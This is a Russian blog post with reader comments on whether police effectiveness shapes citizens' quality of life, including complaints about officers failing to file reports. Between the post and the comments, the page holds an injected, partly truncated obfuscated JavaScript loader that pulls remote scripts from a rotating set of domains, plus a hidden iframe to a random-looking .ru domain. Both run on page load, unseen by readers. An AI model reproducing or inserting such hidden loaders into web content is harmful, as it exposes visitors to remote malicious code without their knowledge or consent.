Какая взаимосвязь между работой полиции и качеством жизни каждого из нас?

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Наталья Белова написалa
    5 оценок, 454 просмотра Обсудить (12)

        От работы правоохранительных органов зависит порядок в стране - так скажет, пожалуй каждый, но ведь  эффективность такой работы напрямую связана с качеством жизни каждого из нас, вне зависимости от уровня нашего образования и материального благосостояния, а это самое главное!

      Вчера, 2.10.15 в репортаже ТВ о совещании Министра МВД РФ, прозвучало, что "преступность снижается…..".
       Анализ применяемого нарядами полиции по вызовам граждан алгоритма показал, что такой алгоритм не только не может способствовать снижению реальной  преступности, но и как видно из   видео-сюжета:  " rel="nofollow" target="_blank">  ,  действия/бездействия полиции повышают как уровень криминогенной обстановки, в особенности, в сфере ЖКХ,так и социального напряжения в обществе, так и способны подорвать устои государства.  Отписки же полиции по отказным материалам достигли невероятных объёмов. 

     Так  почему же  россияне так много критикуют, но мало предлагают,

    а предлагая: http://www.komitet.grasdanski.ru/node/118 , почему-то руководство МВД России  не оставляет устаревшую практику выездов нарядов полиции БЕЗ проведения всех требуемых по закону процессуальных мероприятий на месте происшествия, что и приводит впоследствии и к отпискам, и к безнаказанности, а, следовательно, к хаосу и беспорядкам (мягко сказано).  

    Что же вы думаете, насколько работа полиции способна снизить или повысить качественный уровень нашей жизни?

    В связи с необычностью сюжета и поднятой темой, заранее благодарим за высказывание своего мнения по злободневности поднятой темы под видео-роликов в ютубе.

    <script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"​function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

    <iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 12 комментариев , вы можете свернуть их
    Виктор Родичев # написал комментарий 3 октября 2015, 21:21
    Эффективная работа правоохранительных органов - это гарантия стабильности страны и наоборот! То, что полиция не защищает наши конституционные права - это видно из видеосюжета и, конечно же руководству давно пора задуматься о последствиях такой работы нарядов полиции. То, что сейчас сделана ставка на быстроту приезда нарядов - это фикция и не более! Полиция должна быстро приезжать и также быстро составлять такие протоколы , а простой приезд - никому НЕ нужен - это не работа, а видимость её (правильно в сюжете сказали!)
    Наталья Белова # ответила на комментарий Виктор Родичев 5 октября 2015, 13:10
    Спасибо, но всё же жаль, что лейтенант плохо выглядит....в сюжете.
    Мне рассказывали, что ДО подачи заявления и объяснения, т.е. ДО видео съёмки работы наряда полиции, председатель комитета (заявитель) всё объясняла лично этому лейтенанту: и беспредельную ситуацию в поселке, когда из-за бездействия полиции, банда из 5-6 человек на нее и нападала, и травму руки наносила, и часть имущества сожгла, и запрещала въезжать к своему дому и даже умудрились лишить её, как собственника жилья и члена Партнерства, доли в общем имуществе (!), что вообще в силу закона запрещено и она просила лейтенанта всё грамотно сделать, чтобы он ДОСТОЙНО выглядел и не уронил честь полиции, дав ссылки на закон по её праву снимать на видео...., но он стал звонить начальству, а те "очень хорошо" знают бандюганов из организованной группы лиц в составе 5-6 чел, одна из которых - Галенская в сюжете засветилась....И вместо хорошего обучающего сюжета получилось то, как в реальности работают наряды полиции , от чего страшно и стыдно за полицию!!!
    Но зато, как говорят, уже перед отъездом, лейтенант поблагодарил заявителя и подтвердил, что изначально было правильнее сразу составить протокол....
    Леонид Шейнин # написал комментарий 3 октября 2015, 21:24
    Полиция правопорядка нед.б. экстерриториальной, как сейчас. Во всех нормальных странах она подчинена местным властям.
    Отсутствие такого подчинения - залог дальнейших Кущёвок и прочих Гусь-Хрустальных.
    Валерий Рождественский # ответил на комментарий Леонид Шейнин 4 октября 2015, 10:15
    Местная власть набирает в полицию бандитов и продвигает их по служебной лестнице.
    Леонид Шейнин # ответил на комментарий Валерий Рождественский 4 октября 2015, 13:04
    1)В общем и целом это явление (слияние местной власти с местными бандитами) не подтверждается опытом тех стран. где полиция правопорядка подчинена региональным (или даже городским) властям .
    2)Нельзя отрицать, что в жизни бывают и нестандартные ситуацию Для таких случаев действует так наз. Президентское правление, когда Президент назначает местных руководителей своей властью. Но полиция правопорядка и при такой ситуации подчинена не столичным генералам, а местным властям.
    В этой части у РФ-СССР накоплен уникальный опыт. Фактически мы живём в режиме, близком к Президентскому правлению.
    Парадоксов Друг # написал комментарий 3 октября 2015, 21:25
    Никакой связи
    Наталья Белова # ответила на комментарий Парадоксов Друг 4 октября 2015, 15:09
    Спасибо за "умный" ответ, он указывает, что Вы явно "большой интеллектуал..."! Вот только жаль, что Вам не приходит на ум, что при бездействии полиции, бандиты и хулиганы так распоясаться могу, что мы все как курицы в курятнике, так и по своим домам будем вынуждены сидеть - вот Вам и взаимосвязь и "качество" жизни)))
    Называйте меня просто Ильич # написал комментарий 3 октября 2015, 21:54
    Деятельность современного полицейского направлена на обеспечение процесса обогащения вертикали.
    Поэтому прежде всего надо менять моральный Вектор ,
    полицист должен иметь хорошее содержание, перспективы на пенсию и собственное жильё не за счёт левых доходов а от самой структуры МВД.
    Мент должен бояться одного, потерять свой статус по причине корыстных действий.
    Тогда постепенно ряды сотрудников качественно изменятся в лучшую сторону
    Ефим Андурский # написал комментарий 3 октября 2015, 22:47
    Качественная работа полиции способна повысить уровень нашей жизни.
    Наталья Белова # ответила на комментарий Ефим Андурский 4 октября 2015, 15:14
    Спасибо, Ефим,
    размещение в этом сообществе вопроса по полиции показало, что граждане, которые считают себя интеллектуалами еще не созрели, по большей части, до того, чтобы жить в правовом государстве, оставаясь потребителями, говорящие о правах, но забывающие о своих обязанностях, одной из которых в правовом гос-ве предполагает высокую гражданскую активность, а им даже лень, сидя на дивание ролик посмотреть о работе полиции, но вот рассуждать как и что полиция делает - это каждый "интеллектуал" - профи)))
    remch # написал комментарий 4 октября 2015, 10:20
    работа полиции не способна снизить ... они служат ни народу, ни закону ... максимум что делают - обслуживают воров
    Наталья Белова # ответила на комментарий remch 4 октября 2015, 15:19

    Не могу согласиться, проблема не только в полиции, сколько в обществе….
    То, что МОО "Гражданский Комитет Содействия" ушел дальше нежели др.общ.организации по теме реформы правоохран.органов - тому док-во.....Если же Вы скажете, что в РФ у кого-то есть составленный полицией протокол осмотра: ссылка на www.komitet.grasdanski.ru
    , т.е., по сути, засвидетельствованный полицией факт нарушения судом Конституции…, то я ОЧЕНЬ удивлюсь, как и по наличию частного определения суда против госуд.органа власти.... (см: ссылка на www.komitet.grasdanski.ru ). Ведь советы давать ОЧЕНЬ просто, но вот предоставить доказательства применения своих советов в судах и полиции – это могут единицы!
    Так как без реформы полиции все страна разваливается))) и все усилия граждан по защите своих конституционных прав становятся, без засвидетельственных полицией фактов совершенных правонарушений, аналогичными борьбы с ветром, поэтому поддерживая видео сюжет и предложения: ссылка на www.komitet.grasdanski.ru Вы поможете себе!!! А Вы вообще посмотрели видео-сюжет: ссылка на youtu.be ?

    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 786 записей в блогах и 5299 комментариев.
    Зарегистрировалось 56 новых макспаркеров. Теперь нас 5026662.